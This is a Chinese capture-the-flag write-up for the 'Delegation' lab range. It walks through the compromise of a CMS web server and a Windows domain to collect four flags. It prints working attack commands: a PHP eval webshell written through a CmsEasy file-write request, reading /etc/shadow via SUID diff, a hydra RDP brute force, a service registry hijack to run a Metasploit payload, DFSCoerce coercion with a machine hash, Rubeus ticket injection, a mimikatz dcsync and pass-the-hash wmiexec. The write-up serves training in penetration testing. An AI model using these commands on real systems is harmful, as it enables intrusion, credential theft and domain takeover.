靶标介绍:
Delegation是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对/域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
开局一个IP
39.xx.xx.xx扫描结果发现在80端口有一个web服务
(icmp) Target '39.xx.xx.xx' is aliveicmp alive hosts len is: 139.xx.xx.xx:21 open39.xx.xx.xx:3306 open39.xx.xx.xx:80 open39.xx.xx.xx:22 openalive ports len is: 4start vulscan[*] WebTitle:http://39.xx.xx.xx code:200 len:18 title:中文网页标题
访问目录/admin输入弱口令 admin 123456即可进入后台是个CmsEasy
在模板编辑处存在一个任意文件写入的漏洞
http://39.xx.xx.xx/index.php?case=template&act=save&admin_dir=admin&site=defaultPOST:sid=#data_d_.._d_.._d_.._d_11.php&slen=693&scontent=<?php @eval($_POST[1]);?>
写入成功后会回显OK
使用AntSword连接curl ip.sb发现目标出网
开始反弹shell
反弹成功,权限是www-data
尝试提权发现diff有suid
www-data:/tmp$ find / -user root -perm /4000 2>/dev/nullfind / -user root -perm /4000 2>/dev/null/usr/bin/stapbpf/usr/bin/gpasswd/usr/bin/chfn/usr/bin/su/usr/bin/chsh/usr/bin/staprun/usr/bin/diff/usr/bin/fusermount/usr/bin/sudo/usr/bin/mount/usr/bin/newgrp/usr/bin/umount/usr/bin/passwd/usr/lib/openssh/ssh-keysign/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/eject/dmcrypt-get-device
使用
diff --line-format=%L /dev/null /etc/shadow直接读取系统敏感文件读取home目录下的flag01.txt获取第一个flag
得到flag以及一个Hint
flag01: flag{f29a0048-7714-4733-abd2-5561a239c2e8}Here is the hint: WIN19Adrian
紧接着上传fscan以及frp搭建代理以及扫描内网,使用wget更加高效,不详细说明,具体文章可以看我前几篇靶场wp内网情况
(icmp) Target 172.22.4.7 is alive(icmp) Target 172.22.4.19 is alive(icmp) Target 172.22.4.36 is alive(icmp) Target 172.22.4.45 is alive[*] Icmp alive hosts len is: 4172.22.4.36:22 open172.22.4.36:21 open172.22.4.7:135 open172.22.4.45:80 open172.22.4.36:80 open172.22.4.45:445 open172.22.4.19:445 open172.22.4.7:445 open172.22.4.45:139 open172.22.4.7:139 open172.22.4.45:135 open172.22.4.19:139 open172.22.4.7:88 open172.22.4.19:135 open172.22.4.36:3306 open[*] alive ports len is: 15start vulscan[+] NetInfo:[*]172.22.4.7[->]DC01[->]172.22.4.7[*] 172.22.4.45 XIAORANGWIN19[*] 172.22.4.7 [+]DC XIAORANGDC01 Windows Server 2016 Datacenter 14393[+] NetInfo:[*]172.22.4.45[->]WIN19[->]172.22.4.45[+] NetInfo:[*]172.22.4.19[->]FILESERVER[->]172.22.4.19[*] 172.22.4.7 (Windows Server 2016 Datacenter 14393)[*] 172.22.4.19 XIAORANGFILESERVER Windows Server 2016 Standard 14393[*] WebTitle:http://172.22.4.36 code:200 len:68100 title:中文网页标题[*] WebTitle:http://172.22.4.45 code:200 len:703 title:IIS Windows Server
看到了WIN19结合题目提示用rockyou爆破,这里尝试用Adrian爆破下rdp,因为看到开了3389
hydra -l Adrian -P /usr/share/wordlist/rockyou.txt 172.22.4.45 rdp -vV这里有个密码一直在重试 babygirl1
mstsc登录密码显示过期
用rdesktop看看发现可以进行更改
更改完成 成功登录
通过PrivescCheck.ps1发现可以篡改Chrome浏览器更新服务注册表进行提权
之所以能够提权是因为这个是系统服务,并且也是当前用户可以操控的
reg add HKLMSYSTEMCurrentControlSetServicesgupdate /v ImagePath /t REG_EXPAND_SZ /d "C:windowssystem32cmd.exe"
改cmd.exe发现根本无法正常启动
于是直接生成一个msf正向连接的木马直接上线msf
reg add HKLMSYSTEMCurrentControlSetServicesgupdate /v ImagePath /t REG_EXPAND_SZ /d "C:UsersAdrianDesktop6666.exe"服务在更新的时候msf已经获得了一个session
但是很快就die了
做下进程迁移ps查看下pid然后在使用migrate 进行迁移
虽然服务停止了,但session仍然在线
load kiwicreds_all 发现机器账户WIN19$位于XIAORANG域内
查看flag
flag02: flag{f900a864-abe4-48ab-9204-6eb689753c3f}
上传AdFind.exe发现WIN19机器账户被配置了非约束委派
AdFind.exe -b "DC=XIAORANG,DC=LAB" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn
这个时候就需要强制域控来进行访问了需要利用到DFSCoerce项目地址:https://github.com/Wh04m1001/DFSCoerce
首先在WIN19本地用Rubeus.exe监控来自DC的TGT
Rubeus.exe monitor /interval:1 /filteruser:DC01$间隔为1秒,只接受来自DC01的
紧接着使用项目来让DC向WIN19发起访问
python3 dfscoerce.py -u WIN19$ -hashes :97e779be049d17758ec2f8aea3d0d9f7 -d xiaorang.lab win19 172.22.4.7 #接受端使用ip成功率不高
紧接着就接收到了来着域控的TGT
Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD7ArWptOMD2LqHmx59MEehzRrvwX2SVkoRdKOeCaGJyieUw7caQZ7Xl2t+MqZ+OLooGCIsuZ0ldc2ygmPVXNLm4dYipXiDhAq8JaxHvsXnfFBNNPmenoje+5Y8yySQjTGOxj1sWgTd532AyY9Hg70SVhSk//D8dxJVjW4uo3FrEjiREJqBF9RaqDzI/3Vqw8fHCtrR6MDs6nJQsrFC4xi+Of4Usv5QIXPHo0jbc8xmVHphgj7N777gFID5PT5CM69MMwbp3xZ/pxZ1pIC5A4OwxfQYHrocEMfcQ110KcGrLfMBmWpc7BMJH8w573Bu9O0GlSq4DhQ4vR5a/7NduFOKSI1ZxKr9c7WzavOVEPOacR3bpPEdrk054uEykwGI/rZm5zIvX1qzmkh5y3oeC7QGicoiOfqxcERzuidjBRrXBoXyLgbEcfUIzkKelb2arJyG0m6UNIAZ7SLc1uIsoX1FIgaJ6aMhdIv3aufvOuBMQKUamvxuCM1WeMAcPMc2aXDaQ6yTKcO11lX/HlDcTDjno7gryOHtwEyONpciFHBVeagRXGWs1P7KyvYarNrdoe+TGV5gN5bAfA7sA5bKvAlYROIEVnacFDWz6mse2xEUF8mx6jw9OkH3rkFXPRuK53laIx2I+P5TygIJlFEWG1F/nVntCgaMZmR42JWRZSg5xgkbqOqLanaKQ/+X6LCtxJdDFIP9XAN+7Hp0OTaVhG3HElZWdp3hWIjwTO1EuEIJAU6Q+Bwq/IbUpeMFiyrtW8y+3IsBj/bqgiGM5XGDkFKqem8UwzLMoL31aXDra+jL5IbzAT+TbP/9zFkHjPguBy7HuUslKmYagQSvzsTtiR3RSBsj3A8nZhUPlALD1bsCZoXWH4NsmKnzFeOd+pNCYthJ+/yEikvhtT3xmPY9I6Tre4CI+0wE7B+obei0T5AfuandIOB5Cgm4Bj05g9gAI643hAGevVEGzLGqdvnTIEAmSP88+uYpucQ84UFHmiOUUYvuwFdcg5kEYT/rjeeAOLUWBZ3P1ryr7ZnyVhyVLyrDg+9xCj/TnWzkytyNJraidK2Oe9wwJRS+x5Hb/y25qox5r1h2ENCdB5msGYM6af3TD/Ucs6t/JyYWC/6lZW6jUNktXZSTGENem9FS06yndPaZ1m22GlAYsz55sEKEbOiPNsDPZfh9zZz5537rKvE7V+/ExHgfL3f4gJv92F6PJZzbeTtFtyQN6PjSFMn1D33aKzyqGIpEMlg8kgzHm5O8kxIjyeMAredcz/vzBuo+4DY8iY76e3B/I5tG+CHdlQ/w5vIV38f1Tn4I5RtRVt62Iwis1VIT62rawhTC/ynQ8vcEBYMhyQ/dUdNWf9Rj8y8EY6AJd5y560Km5fkoDcxXp7PoWjVMBL2LCWhJdiBAJDu3qYdQ+de0MLOZfHHNjMK/rcIjpnIgYltW1IM0KsxKjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCePS0YAEetStsNigiu6qhrf0+bveuIAulyYGUQwrQ/NKEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDIzMDcxNTE0NDY1MlqmERgPMjAyMzA3MTYwMDQ2NTJapxEYDzIwMjMwNzIyMTQ0NjUyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==
接着就是用mimikatz请求dcsync
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:xiaorangAdministrator" exit
wmiexec 上去读flag
impacket-wmiexec xiaorang/Administrator@172.22.4.19 -hashes :4889f6553239ace1f7c47fa2c619c252FILESERVER
flag03: flag{f7775e67-9ea6-4920-b0bd-db5ee11b1721}impacket-wmiexec xiaorang/Administrator@172.22.4.7 -hashes :4889f6553239ace1f7c47fa2c619c252DC01
flag04: flag{fb5fbd8a-1ad9-434f-9ce8-3ddcfe227ba8}
原文始发于微信公众号(暗魂攻防实验室):【渗透测试】春秋云镜靶场-Delegation
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论